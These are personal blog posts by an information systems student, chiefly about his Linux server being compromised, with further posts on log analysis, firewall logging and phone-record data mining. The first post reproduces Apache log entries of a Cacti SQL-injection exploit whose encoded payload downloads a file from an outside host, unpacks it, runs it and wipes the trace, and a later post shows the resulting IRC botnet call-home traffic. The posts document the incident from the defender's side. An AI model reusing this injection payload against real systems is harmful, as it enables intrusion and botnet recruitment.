Information Systems Grad School

Secunia says Cacti has four known vulnerabilities. I had forgotten that I had installed Cacti when I was trying to count the pages I had printed and compare those results those from my HP printer. Same IP as my computer was IRCing to. I should start tracking changes so I can have a record of what was changed, when it was changed, and if I granted myself access.

Here's the log files from apache:

213.189.5.233 - - [21/May/2007:14:44:14 -0400] "GET /cacti/ HTTP/1.0" 200 1327 "-" "-"
213.189.5.233 - - [22/May/2007:04:08:21 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,119,103,101,116,32,104,116,116,112,58,47,47,105,99,101,109,97,110,46,109,97,114,116,101,46,114,111,47,103,46,106,112,103,32,45,79,32,47,116,109,112,47,103,46,106,112,103,59,116,97,114,32,120,122,118,102,32,47,116,109,112,47,103,46,106,112,103,32,45,67,32,47,116,109,112,59,47,116,109,112,47,103,111,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:07 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,102,101,116,99,104,32,45,111,32,47,116,109,112,47,103,111,46,106,112,103,32,104,116,116,112,58,47,47,105,99,101,109,97,110,46,109,97,114,116,101,46,114,111,47,103,111,46,106,112,103,59,116,97,114,32,120,122,118,102,32,47,116,109,112,47,103,111,46,106,112,103,32,45,67,32,47,116,109,112,59,47,116,109,112,47,103,111,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:09 -0400] "GET /cacti/rra/suntzu.log HTTP/1.0" 404 296 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:09 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(114,109,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"

Apparently, that was all it took for my server to be compromised.

Also, I saved the tcpdump from my previous post as an HTML file for people that had trouble with it.

Posted by Larry at 7:47 PM | Permalink | Comments (0) | TrackBacks (0)

IIf you've ever wondered exactly how a vulnerability is exploited, or how botnets happen, check the below. Keep in mind that my system is up-to-date on just about everything I can find to update on it. I've also informed the abuse address of the IP in question about what was going on over a month ago, and the rogue server is still out there, relaying information from compromised Linux servers.

I keep a lot of outbound ports closed so that if one of my servers is compromised, it doesn't become another bot on the net. I finally caught the process again, so I started a capture and then opened the ports. I'm not sure what to make of it because the IP address in question goes back to what appears to be a dedicated server in Italy, but the login information says it's a NASA IRC server. What NASA would be doing on serving IRC to the public is beyond me, unless it's a honeypot. It's probably not a real NASA server, at least that's what I hope. Anyway, here are the fun details of what happens when my server tries to call home to its haxor:

The packet analysis also reveals a clue about the origin of the hack: Mihai is the Romanian version of Michael.

Download the uncensored TCPDump file and see for yourself.

My server: SYN
213.92.118.223 223-118-92-213.serverdedicati.seflow.net ACK
my server: ACK SYN
my server: ...i
my server: NICK a3sh-.
: NOTICE AUTH :*** Looking up your hostname..NOTICE AUTH :*** Checking Ident..
my server: ....
: NOTICE AUTH :*** No ident response..
my server: FF 86 C5 CD
: NOTICE AUTH :*** Found your hostname.
my server: ....
:.y.I
my server: USER nh2ies x.x.x.x 213.92.118.223 :Linux mrtg.sampas.net 2.6.9-42.0.10.ELsmp #1 SMP Fri Feb 16 17:17:21 EST 2007 i686 i686 i386 GNU/Linux.
: PING :1041065789..
my server: ....
: .y..
my server: PONG :1041065789.
: (ACK)
: www.nasa.gov 433 * a3sh- :Nickname is already in use..
my server: (ACK)
my server: NICK a3sh-685.
: :www.nasa.gov 001 a3sh-685 :Welcome to the Internet Relay Network : a3sh-685..:www.nasa.gov 002 a3sh-685 :Your host is www.nasa.gov, running version beware1.5.7..:www.nasa.gov 003 a3sh-685 :This server was created Tue Jul 13 2004 at 20:36:17 GMT..:www.nasa.gov 004 a3sh-685 www.nasa.gov beware1.5.7 dgikoswx biklmnoprstv..:www.nasa.gov 005 a3sh-685 MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=10 MAXBANS=45 :are supported by this server..:www.nasa.gov 005 a3sh-685 NICKLEN=19 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459 :are supported by this server..:www.nasa.gov 251 a3sh-685 :There are 172 users and 0 invisible on 1 servers..:www.nasa.gov 254 a3sh-685 1 :channels formed..:www.nasa.gov 255 a3sh-685 :I have 172 clients and 0 servers..:www.nasa.gov NOTICE a3sh-685 :Highest connection count: 195 (195 clients)..:www.nasa.gov 422 a3sh-685 :MOTD File is missing..:www.nasa.gov NOTICE a3sh-685 :on 1 ca 1(4) ft 10(10)..
my server: JOIN #mihai.
::www.nasa.gov 001 a3sh-685 :Welcome to the Internet Relay Network a3sh-685..:www.nasa.gov 002 a3sh-685 :Your host is www.nasa.gov, running version beware1.5.7..:www.nasa.gov 003 a3sh-685 :This server was created Tue Jul 13 2004 at 20:36:17 GMT..:www.nasa.gov 004 a3sh-685 www.nasa.gov beware1.5.7 dgikoswx biklmnoprstv..:www.nasa.gov 005 a3sh-685 MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=10 MAXBANS=45 :are supported by this server..:www.nasa.gov 005 a3sh-685 NICKLEN=19 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459 :are supported by this server..:www.nasa.gov 251 a3sh-685 :There are 172 users and 0 invisible on 1 servers..:www.nasa.gov 254 a3sh-685 1 :channels formed..:www.nasa.gov 255 a3sh-685 :I have 172 clients and 0 servers..:www.nasa.gov NOTICE a3sh-685 :Highest connection count: 195 (195 clients)..:www.nasa.gov 422 a3sh-685 :MOTD File is missing..:www.nasa.gov NOTICE a3sh-685 :on 1 ca 1(4) ft 10(10)..

:a3sh-685!~nh2ies@c-68-34-65-58.hsd1.md.comcast.net JOIN :#mihai..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-685 a3sh-9337 a3sh-4554 a3sh-8354 a3sh-2934 a3sh-3103 a3sh-8151 a3sh-4633 a3sh-3872 a3sh-2552 a3sh-1595 a3sh-9230 a3sh-5907 a3sh-2313 a3sh-6041 a3sh-2448 a3sh-5134 a3sh-3633 a3sh-5025 a3sh-1979 a3sh-9893 a3sh-8688 a3sh-7544 a3sh-4987 a3sh-975 a3sh-8640 a3sh-7756 a3sh-6376 a3sh-9321 a3sh-5422 a3sh-5761 a3sh-9259 a3sh-5956 a3sh-7978 a3sh-9088 a3sh-701 a3sh-4473 a3sh-7260 a3sh-2013 a3sh-9890 a3sh-933 a3sh-8007 a3sh-6486 a3sh-7318 a3sh-5495 a3sh-6205 a3sh-6078..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-7555 a3sh-791 a3sh-1336 a3sh-5923 a3sh-4822 a3sh-8527 a3sh-4988 a3sh-90 a3sh-4895 a3sh-7019 a3sh-6666 a3sh-4330 a3sh-8521 a3sh-215 a3sh-5509 a3sh-6106 a3sh-4579 a3sh-8655 a3sh-1998 a3sh-9573 a3sh-5017 a3sh-6554 a3sh-8403 a3sh-288 a3sh-3328 a3sh-4059 a3sh-6246 a3sh-697 a3sh-7085 a3sh-9646 a3sh-8876 a3sh-6779 a3sh-3730 a3sh-8248 a3sh-4757 a3sh-7497 a3sh-4715 a3sh-4357 a3sh-229 a3sh-4681 a3sh-8629 a3sh-2734 a3sh-6290 a3sh-930 a3sh-1515 a3sh-1103 a3sh-3405 a3sh-9597..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-914 a3sh-2419 a3sh-1961 a3sh-624 a3sh-9217 a3sh-8124 a3sh-9198 a3sh-1667 a3sh-7710 a3sh-3272 a3sh-2880 a3sh-5360 a3sh-9749 a3sh-60 a3sh-6378 a3sh-2191 a3sh-8644 a3sh-1313 a3sh-2447 a3sh-3410 a3sh-4480 a3sh-8506 a3sh-1625 a3sh-5664 a3sh-5614 a3sh-9804 a3sh-1344 a3sh-4523 a3sh-7203 a3sh-3438 a3sh-36

46 a3sh-6682 a3sh-8430 a3sh-700 a3sh-4929 a3sh-9957 a3sh-9284 a3sh-1775 +a3sh-3250 a3sh-2594 a3sh-3037 a3sh-3353 a3sh-2931 a3sh-366 a3sh-934 a3sh-1772 a3sh-8760 a3sh-7777..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-8519 a3sh-8691 a3sh-9382 a3sh-3749 a3sh-8126 a3sh-5627 a3sh-1038 a3sh-3316 a3sh-5240 a3sh-379 a3sh-6854 a3sh-9518 a3sh-1493 a3sh-7073 a3sh-9670 +a3sh-3201 a3sh-7933 a3sh-4989 a3sh-960 a3sh-3584 a3sh-7571 a3sh-9905 a3sh-6198 a3sh-9436 a3sh-7021 a3sh-9951 a3sh-43 a3sh-1578 @a3sh-..:www.nasa.gov 366 a3sh-685 #mihai :End of /NAMES list...

Posted by Larry at 7:02 PM | Permalink | Comments (0) | TrackBacks (0)

I first noticed a mysterious connection on a netstat:

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 1 mrtg.sampas.net:42321 223-118-92-213.server:49153 SYN_SENT

F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD
1 S apache 18005 1 0 76 0 - 1282 - Apr10 ? 00:00:00 sh -i

Soon after, perl became a runaway process, consuming 100% of my CPU time. And I thought /sbin/nologin meant user Apache couldn't just get a shell. I updated zlib from 1.2.2 to 1.2.3 to fix a security hole. up2date -u reports everything is up-to-date. (It did that for my old zlib, too.) I don't see any new holes in my applications, MT and Gallery. I did a Nessus scan with recent updates, and all it showed no holes and one warning. I ran clamscan and it didn't find anything, either. Rkhunter found nothing, and nikto gave me the following output:

+ Server: Apache/2.0.52 (Red Hat) + Allowed HTTP Methods: GET,HEAD,POST,OPTIONS,TRACE + Apache/2.0.52 appears to be outdated (current is at least Apache/2.2.3). Apache 1.3.33 is still maintained and considered secure. + / - TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details (TRACE) + /usage/ - Webalizer may be installed. Versions lower than 2.10-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02. (GET)

So now I'm stuck looking through my apache access logs, because that's the only thing exposed to the outside world.

I did a capture just while open my firewall for a couple of minutes, and I saw it try to log in to an IRC channel. Ouch. I've been pwned. Fortunately, my firewall stops my server from being used for attacks, and I was able to block the port range used by the IRC bot.

Finally, Red Hat released a lot of new patches for PHP, and I set PerlTaintCheck On in /etc/httpd/conf.d/perl.conf, which was the real problem: user Apache had started listening on port 80 using Perl, so I couldn't even restart httpd.

Next time, I need to check the logs closer and post a network capture of the login process.

Posted by Larry at 7:15 PM | Permalink | Comments (0) | TrackBacks (1)

Way back in 1999, I was looking for a packet analyzer. I was familiar with EtherPeek for the Macintosh from a few years before, and I found that the AG Group was producing EtherPeek for Windows, too. The AG Group is now WildPackets, and they are exceedingly helpful to anyone that has to troubleshoot data networks. AG Group always offered some cool network freebies: IP Subnet Calculator, netTools and a great protocol reference chart.

One of their people, J. Scott Haugdahl, has an excellent book, Network Analysis and Troubleshooting, which offers a bottom-up review of the OSI 7-layer model . (Which one are you: All People Say They Need Data Processing or Please Do Not Throw Sausage Pizza Away?)

I liked EtherPeek and the book so much that I bought both and paid out of my own pocket even though my job was managing the network. Of course, this was back in the day when running tcpdump required you to know your IRQ, DMA and chip set (i.e. DEC Tulip). My job at the time was helping change a campus network from Netware to TCP/IP when Windows and Macintosh didn't even install a TCP/IP stack by default. We went from three-and-a-half network protocols (two different Netware frame types) to one and a half (we still had a couple of AppleTalk issues.) Each computer was on the Internet with a public IP address and no firewall. The ping of death still worked against most machines, and we also got hit with Smurf and Trinoo attacks that would disrupt all online activity.

WildPackets makes some excellent packet analyzers for wired and wireless networks. Now their base-level product is free: OmniPeek Personal. While I have been using Ethereal since my old version of EtherPeek became obsolete because it was on my ancient Dell laptop, I missed EtherPeek because it was the first packet analyzer I really got to know well. I could create filters and find exactly what I needed to find. EtherPeek also had good summary statistical functions, which could tell me who was producing the most traffic on my networks. Omnipeek Personal is better than my copy of EtherPeek was because it includes some expert analysis about bad packets and delayed response times. It also produces HTML statistics just like the original, and it has a better interface than Ethereal, using color to show differences between packets.

For those of you that underestimate the power of color, try printing a Google or Mapquest map in black and white and one in color and see which one is easier to read while you're driving. OmniPeek makes it easier to read your packet stats and is easier on your eyes than Ethereal. It's also supposed to do wireless captures -- I'll update when I get a compatible chipset wireless card.

Posted by Larry at 5:18 PM | Permalink | Comments (0) | TrackBacks (0)

In dealing with financial activities, our law enforcement/intelligence community is someplace between Get Smart and Mission:Impossible, depending on which story you read in the newspaper.

Eighty-one people in 17 states used a California woman's Social Security number, according to the AP on June 18, 2006. You'd think the IRS or Social Security Administration would notice that 81 jobs falls outside the normal range of jobs. Maybe even past 3 standard deviations above the mean number of jobs that people hold in a given time period.

"They knew what was happening but wouldn't do anything," said Schmierer, 33, a housewife in this San Francisco suburb. "One name, one number; why can't they just match it up?"

Then on June 23, the New York Times breaks a story about how the Treasury is overseeing a CIA program that monitors data going through the Society for Worldwide Interbank Financial Telecommunications. What do these reporters think FinCen does? They look for the same kind of activity that the NY Times-revealed program does, except they've been doing it a lot longer than the CIA.

A former compliance officer for a major brokerage once told me that you might get away with insider trading once. After that the investigators would know the people with whom you attended kindergarten and might be in a position to give you insider information. That's link analysis.

The last time I bought AMEX traveler's cheques it took half an hour because of the paperwork required by the bank to satisfy post-9/11 financial tracking regulations, so it doesn't surprise me that the intelligence community is monitoring international transactions. (The paperwork is so tedious that I'm going to carry cash more often than not.)

Our government can access tons and tons of data about every transaction that travels across our borders, but without efficient algorithms for flagging suspicious activity, it will all be useless. Placing every tax return and W-2 statement into a single data warehouse would be academic. Yahoo and Google probably generate more data in a week than all our tax returns and W-2s annually. You would think the Social Security Administration would be able to see the fraud in their systems. The ACLU wouldn't even be able to argue that our government isn't allowed to look at its own data.

Once you loaded the data, a few queries could spit out suspicious Social Security Number users in a day or two. Again, the budget for this would be under a million or two.

Posted by Larry at 10:31 AM | Permalink | Comments (0) | TrackBacks (0)

I see a lot of 404 errors in my Apache logs. A 404 error is a file not found, e.g. someone has requested a file that's not there. Often it means I made a typo in a configuration or HTML someplace. More often, it means someone someplace is probing my server for weak web applications.

Linux and open source software have made it easy to add web applications running under Apache and MySQL. The problem is as more and more sites start using these cool web applications, hackers are able to find holes in them. The developers fix the holes and release patches, but many webmasters don't apply the patches. Thus I see probes like the one below in my Apache logs:

212.83.253.101 - - [19/Jun/2006:09:24:49 -0400] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 320 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:49 -0400] "GET /adxmlrpc.php HTTP/1.0" 404 294 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:49 -0400] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 303 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:49 -0400] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 304 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:50 -0400] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 304 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:50 -0400] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 301 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:50 -0400] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 298 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:50 -0400] "GET /ads/adxmlrpc.php HTTP/1.0" 404 298 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:50 -0400] "GET /xmlrpc.php HTTP/1.0" 404 292 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:51 -0400] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 299 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:51 -0400] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 299 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:51 -0400] "GET /blog/xmlrpc.php HTTP/1.0" 404 297 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:51 -0400] "GET /drupal/xmlrpc.php HTTP/1.0" 404 299 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:52 -0400] "GET /community/xmlrpc.php HTTP/1.0" 404 302 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:52 -0400] "GET /blogs/xmlrpc.php HTTP/1.0" 404 298 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:52 -0400] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 305 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:52 -0400] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 304 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:52 -0400] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.0" 404 308 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:53 -0400] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.0" 404 302 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:53 -0400] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.0" 404 305 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:53 -0400] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 302 "-" "-"
212.83.253.101 - - [19/Jun/2006:09:24:53 -0400] "GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 305 "-" "-"

This is a probe, not an attack. There's nothing illegal about requesting files that aren't on my server, is there? But if I touch /var/www/html/adxmlrpc.php, we may find out what happens next. Note that most of these requests, while probing for different applications, share one thing in common: RPC on PHP.

The below is chart of probes by date and request on this webserver. There's not enough space to list each one as it corresponds to the color. (MS Excel shows me data point details info on mouseover in my pivot table.)

Posted by Larry at 1:59 PM | Permalink | Comments (0) | TrackBacks (0)

Data warehousing and data marts would be simple to construct if only the data were in a standard format. Five years from now, businesses will take OLAP for granted. (OLAP is a fancy way of saying we're going to automate the sums and averages of your sales data over time so you don't have to do all that stuff in Excel any more.) Five to ten years from now, businesses will live or die by their data mining algorithms. (I classify DM as a step above standard OLAP.) Before this can happen, the data have to be available in a usable form.

I come from an information security background, thus I spend far too much time poring over computer logs: web server access logs, firewall logs, Windows event logs, not to mention /var/log/*. I have learned lots of stupid log tricks, like using logwatch, grep (my favorite), Snare to send Windows logs to syslog, and now, Microsoft's free Logparser tool. Logparser has poor documentation but will certainly pay you back for time taken to learn to use it. There's even a non-Microsoft site dedicated to logparser.

Note: Syslog does not store data in 3NF rows. If you want to be able to sort by fields with destPort, sourcePort, sourceIP, destIP, without doing text search, you'll be doing a LOT of ETL work.

This week I was thinking about replacing my firewall/router (a Netopia R9100 with the hardware VPN upgrade that I trade off with a Linksys WRT-54GS (v3) when I'm not paranoid about using wireless.) And yes, I'm not supposed to tell you that, but it doesn't really make a difference if we're both using nmap. So I looked at firewall vendors websites to learn what I could about logging capabilities. I'm slightly less concerned about security in my home lab than I am about collecting data on attacks. Firewalls have been around for over ten years now, so you'd think they would have logging down.

Watchguard: several logging options, including syslog and XML, SNMP costs extra.

Juniper/NetScreen: syslog, SNMP, NetIQ (If I feel like paying for that, too.)

Checkpoint: "Eventia Reporter™ is a complete reporting system that delivers in-depth network security activity and event information from Check Point log data." This means I can look at CheckPoint logs, but I can't correlate them to anything else. This Checkpoint vs. Cisco page is also interesting.

SonicWall: "ViewPoint®, Local Log, Syslog, WebTrends" I can pay extra for SonicWall's "Viewpoint" product, but I still can't correlate SonicWall logs to any other logs. One SonicWall includes a "secure" switch in their firewall: I would love to see what happens when I try an arp spoof. (If I wanted a switch, I would buy one.)

Cisco PIX: SNMP, Syslog, and AAA ("Authentication, Authorization, and Accounting Support") It does Cisco logging. It also has a CLI. (Command-Line Interface.) Unless Cisco starts giving me free hardware, I'm not sure why I'd use a PIX. If I blow a command, my network is not secure. A CLI is fine when it's obvious if a command is working or not, as with routing, but with firewalls, it makes me nervous. Then again, you should test every port after entering a rule change on your firewall.

Microsoft ISA Server: "ISA Server 2004 provides detailed security and access logs in standard data formats, such as delimited text files, Microsoft SQL Server databases, or SQL Server 2000 Desktop Engine (MSDE) databases."

I don't even like software firewalls, but Microsoft makes it easy for me. At $1,500 plus $250 for decent software, Watchguard is more expensive than ISA server. Checkpoint and Juniper won't even tell me how much their products cost. Sonicwall, Watchguard, and ISA Server are all priced on CDW.

If firewall data are this disparate, I can't imagine what a pain it must be to build data warehouses with data from other sources. Current firewall products seem to create their own silos and make it difficult to track intruders across a network rather than just at the perimeter.

Posted by Larry at 10:59 PM | Permalink | Comments (0) | TrackBacks (0)

Using syslog, MS SQL 2005, SQL Server Analysis Services, and MS Excel, I can build a cube with my firewall log violations and then import the cube into Excel and produce pivot tables. While this might seem more complicated than it needs to be, I could produce a daily scorecard of attacks. The only catch is that I need a firewall that logs to SQL server or a syslog to SQL server connector. The syslog => SQL connection would be tough because my router/firewall doesn't do uniform syslog notifications. I know enterprise-level firewalls do much better logging, like the Watchguard X-series which I was fond of just because I could make them do almost anything. The last time I checked, though, they still cost $1,500 for the base model plus $500 for the appropriate software.

With the Watchguard's new XML logging, I could create a SQL Server Integration Services package to import the data regularly. From there, I could get SQL Server Analysis services to process my cube each night. Then I use Microsoft Sharepoint's Scorecard or OLAP web part to display statistics. Best of all, I wouldn't have to mess with doing my own manual extract-transform-load (ETL) of my router log data.

The graph below represents a simple count of attacks by port on my router. Port 0 corresponds to ICMP. (I don't respond to ping requests.) The rest of the ports are closed, except for port 80, which you're using now. I ban a few IPs on port 80 because they won't stop posting junk trackbacks onto my blog. The ports are in alphabetical order rather than numerical order because I must store them in text fields rather than numerical fields in the database. If the port numbers aren't text then SSAS will OLAP them and I'll end up with the sum of all ports, which is nonsense but nevertheless might make a good statistic for MBA-types. While the graphic may not be all that impressive, the scalability is. Using SQL and SSAS, I could track probes and attacks on hundreds of firewalls at a time, track trends over time, and even predict the level of future probes.

Posted by Larry at 6:14 PM | Permalink | Comments (0) | TrackBacks (0)

Being assigned a data warehousing/data mining project for class sounds like fun, but where am I supposed to get a data set? I can buy a database of all area codes and exchanges with latitude and longitude, but I would still have to simulate a hundred million records to address scalability and query optimization issues. Then I could find out if my estimations of the size of records is within a factor of ten, but the networks I see still wouldn't be "real" and I would have no idea if that's what real social networks looked like. (As an undergrad English Lit major, I was reading 18th Century epistolary novels instead of taking Data Structures like my Computer Science major classmates. The sad part is that Data Strutures would have been more interesting.)

Fortunately, data magically appear on my Linux box every day.

Each morning at four am, logwatch runs on my Fedora Core 4 (Red Hat Linux) box. It tells me how many times nonexistent files on my webserver have been requested, and how many router firewall violation attempts have been logged. It also tells me how many times Apache logged a "method not allowed" 405 code. I have several daily log files that give me useful information on attacks. The problem is that there are so many attacks that if I banned every IP that looked for a web application hole or probed a port I wouldn't have time for anything else.

So it makes sense to look for attack source IP (Internet Protocol) addresses that probe my router AND request holes in web apps. To do this I need three files: my router log from syslog; and two greps of all my Apache logs. (grep -h will suppress file names at the beginning of each line) looking for 404 and 405 errors. This gives me three tables, from which I can do inner joins on source IP in each. Of course, I have do do some tedious data cleanup to get the text log files into Excel and from there Access. (I always underestimate the time it takes to clean up data.) From Access, I'm going to go to SQL 2005, Analysis Services, and build a cube. From there I should be able to "see" the attacks using Pivot Tables in Microsoft Excel.

If I see a source IP in my router log and Apache error logs, then it's probably worth banning. Correlating IP addresses to identify those involved in multiple methods of attack takes me from hundreds of IP addresses down to six.

Posted by Larry at 3:49 PM | Permalink | Comments (0) | TrackBacks (0)

Today, USA Today reported that the National Security Agency has been collecting domestic phone records of many of us U.S. citizens. Unlike everyone else blogging on this today, I'm taking no position on the ethicality of this activity. Instead, I'm going to tell you what I would do with those phone records from the perspective of a database geek. There's plenty of other analysis going on elsewhere, and I'm no constitutional lawyer.

I've been using Vonage for a while now, and I have access to my own phone records on the computer. It's easy enough to cut and paste my Vonage call records into Excel and from there into Access. From Access, I can easily export/import them into the Relational Database Mangement System of my choice, which for now is MS SQL 2005. However, there are many more out there.

Each records looks something like this: Date, Time (you can combine these into a LongDate), From phone number, To phone number, Duration, and a unique transaction ID. I get all this for incoming and outgoing calls. It's great for anyone that does billing for phone time. I'm assuming that these are the same kind of records that the NSA gets. Once the NSA gets these records, they do a data transform to make all the fields fit into their system in a uniform manner. Since the data is already fairly simple, they don't have to do much, and even a moderately skilled programmer like me could write something to transfer phone records almost as fast as they could get them.

If I had phone records from other people, I could combine them with my phone records into one massive table (relation, in database-speak). I could then do a reflexive query on them to pull a list of all the people I had contact with, through incoming or outgoing calls. I could then do another query to pull all contacts of all the people who had called me; this would show my my friends' friends. If I had access to more data about the phone numbers, say through geocoding (a fancy way of saying latitude and longitude attached to each phone number), I could create a map and track a phone tree. If I call someone in New York, and they call someone in Paris, and the person in Paris calls someone in Amman, I could draw lines making the connections on a map.

For this level of tracking to work, the NSA has to have absolutely all the phone records they can possibly get their hands on. If they have a target talking to someone and that someone talks to someone else and the NSA's records drop at the first friend of the target, they're lost. It would be a dead end. If they get all the records, the creation of a massive data warehouse that shows connections between people is pretty much academic. The budget for doing all this has dropped dramatically over recent years: you might be able to do it with a couple of Netezza data warehouse appliances. Rumor has it the NSA was Netezza's first customer. All the hardware to do it might cost under a million dollars. The tricky part, as with all data mining projects, is getting good data, and the NSA has that problem solved.

The hardest part left for them is scalability: they're trying to drink from a firehose, but the records aren't that big, which makes it feasable. You might be able to store all the number-only data in a record as short as 40 bytes: LongDate, Number, Number, Number, Number. (I'm not going to get into data types in depth here, but let's assume we can store phone numbers as numbers and not text to save space.) Thus one million phone records would occupy 40 megabytes. If the US makes a hundred million phone calls a day, that's about 4 GB a day of data. Large, but manageable if you have a large budget. Even if you double the key identifier size to 16 bytes (to cover hundreds of millions of calls) you're still only up to 4.8 GB per 100 million calls.

Only after you've identified a target would you want to create a join query that connects names and addresses with phone numbers; this would be far more efficient than attaching names to the phone record tables, and would give the NSA a chance to say they're recording numbers only. If the NSA uses a consumer data company like, say, Acxiom, to get information on phone numbers post-targeting, then they're not even subject to the Freedom of Information Act or US Privacy Law.

The end result is that the NSA has the capability to map our social and business networks; given enough time and hardware, they could even plot them on satellite photos, creating a cool mish-mash of lines across neighborhoods. They could create files on us all like Friendster lists our friends and their connections. Whether the NSA's system actually works efficiently, we'll never know.

Posted by Larry at 1:18 PM | Permalink | Comments (0) | TrackBacks (1)

I do Windows, Unix (Solaris), and Linux (mostly Red Hat). Everyone who's into "open-source" keeps telling me how much more secure it is. I'm a CISSP and I've been installing open-source OSes since I had to know the chipset, IRQ and DMA of the NICs in my box to get networking to work. (The DEC Tulip was my favorite.) When I started working with Solaris 7 and Red Hat 4.x, telnet was enabled by default. I still wonder if telnet was enabled on a Trusted Solaris 7 default install. People who tell me any form of Unix is inherently more secure than any Windows don't seem to be familiar with the Morris worm, the Leshka Sendmail exploit, or BIND vulnerabilities. In fact, just mentioning BIND and sendmail in the same sentence is likely to send your security coordinator into the bunker for the rest of the day. Mind you, I've also seen IIS flaws. Can't we all just get along and implement security best practices on whatever platforms we're using?

Ruby on Rails shows a lot of promise as to helping people get up and running on applications quickly. The tutorials are pretty helpful , but there are a a couple of caveats:

In the configuration wizard, you can also just accept all of the defaults, except that in the security panel you must uncheck the "Modify Security Settings" checkbox (Figure 4). This is because starting with version 4.1.7, MySQL uses a new authentication algorithm that is not compatible with older client software, including the current version of Rails. By unchecking this box, you can access MySQL without a password.

This is not the path to secure computing. MySQL should NOT ship with a blank root password. Tutorials should not encourage the use of blank root passwords.

And they have you set up your server as to leave database.yml publicly available. I see Drupal attacks (xmlrpc.php) every day; it's only a matter of time before I start to see RoR attacks.

It's the developers' job to make it work. It's your job to make it work securely. Today's hackers don't even know C and have never heard of Kernighan and Ritchie; all they need is a script and an Internet connection to take advantage of your vulnerabilities.

Posted by Larry at 11:37 PM | Permalink | Comments (0) | TrackBacks (0)

Ruby on Rails is the most recently hyped language, so I though about testing it out on my development server. I followed the tutorial available on the RoR website. It went fine until I did a ./scripts/generate command and got lot of syntax errrors:

/usr/lib/ruby/1.8/yaml.rb:133:in `load': syntax error on line 27, col 2: `  host: localhost' (ArgumentError)
 from /usr/lib/ruby/gems/1.8/gems/rails-1.1.2/lib/initializer.rb:459:in `database_configuration'
        from /usr/lib/ruby/gems/1.8/gems/rails-1.1.2/lib/initializer.rb:181:in `initialize_database'
        from /usr/lib/ruby/gems/1.8/gems/rails-1.1.2/lib/initializer.rb:84:in `process'
        from /usr/lib/ruby/gems/1.8/gems/rails-1.1.2/lib/initializer.rb:42:in `run'
        from ../config/../config/environment.rb:13
        from /usr/lib/site_ruby/1.8/rubygems/custom_require.rb:21:in `require'
        from /usr/lib/ruby/gems/1.8/gems/activesupport-1.3.1/lib/active_support/dependencies.rb:147:in `require'
